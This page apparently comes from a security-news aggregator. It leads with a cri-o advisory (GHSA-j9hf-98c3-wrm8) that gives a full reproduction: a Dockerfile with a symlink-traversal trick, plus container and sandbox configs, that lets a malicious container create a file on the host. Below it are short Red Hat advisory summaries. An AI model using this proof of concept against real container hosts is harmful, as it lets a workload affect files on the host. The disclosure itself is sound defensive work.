
Tag

#linux

GHSA-j9hf-98c3-wrm8: malicious container creates symlink "mtab" on the host

### Impact

A malicious container can affect the host by taking advantage of code cri-o added to show the container mounts on the host. A workload built from this Dockerfile:

```
FROM docker.io/library/busybox as source
RUN mkdir /extra && cd /extra && ln -s ../../../../../../../../root etc
FROM scratch
COPY --from=source /bin /bin
COPY --from=source /lib /lib
COPY --from=source /extra .
```

and this container config:

```
{
  "metadata": {
    "name": "busybox"
  },
  "image": {
    "image": "localhost/test"
  },
  "command": [
    "/bin/true"
  ],
  "linux": {}
}
```

and this sandbox config:

```
{
  "metadata": {
    "name": "test-sandbox",
    "namespace": "default",
    "attempt": 1,
    "uid": "edishd83djaideaduwk28bcsb"
  },
  "linux": {
    "security_context": {
      "namespace_options": {
        "network": 2
      }
    }
  }
}
```

will create a file on host `/host/mtab`

### Patches

1.30.1, 1.29.5, 1.28.7

### Workarounds

Unfortunately not

### References

_A...

ghsa
#linux #docker

Ukraine Hit by Cobalt Strike Campaign Using Malicious Excel Files

Beware Macro! Ukrainian users and cyberinfrastructure are being hit by a new malware campaign in which hackers are…

Red Hat Security Advisory 2024-3568-03

Red Hat Security Advisory 2024-3568-03 - New Red Hat Single Sign-On 7.6.9 packages are now available for Red Hat Enterprise Linux 9.

Red Hat Security Advisory 2024-3567-03

Red Hat Security Advisory 2024-3567-03 - New Red Hat Single Sign-On 7.6.9 packages are now available for Red Hat Enterprise Linux 8.

Red Hat Security Advisory 2024-3566-03

Red Hat Security Advisory 2024-3566-03 - New Red Hat Single Sign-On 7.6.9 packages are now available for Red Hat Enterprise Linux 7.

Red Hat Security Advisory 2024-3561-03

Red Hat Security Advisory 2024-3561-03 - An update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section. Issues addressed include a server-side request forgery vulnerability.

Red Hat Security Advisory 2024-3560-03

Red Hat Security Advisory 2024-3560-03 - An update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section. Issues addressed include a server-side request forgery vulnerability.

Red Hat Security Advisory 2024-3559-03

Red Hat Security Advisory 2024-3559-03 - An update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section. Issues addressed include a server-side request forgery vulnerability.

Red Hat Security Advisory 2024-3553-03

Red Hat Security Advisory 2024-3553-03 - An update for the nodejs:16 package is now available for Red Hat Enterprise Linux 8.6.0 Advanced Update Support. Issues addressed include a denial of service vulnerability.

Red Hat Security Advisory 2024-3552-03

Red Hat Security Advisory 2024-3552-03 - An update for python-idna is now available for Red Hat Enterprise Linux 8.6. Issues addressed include a denial of service vulnerability.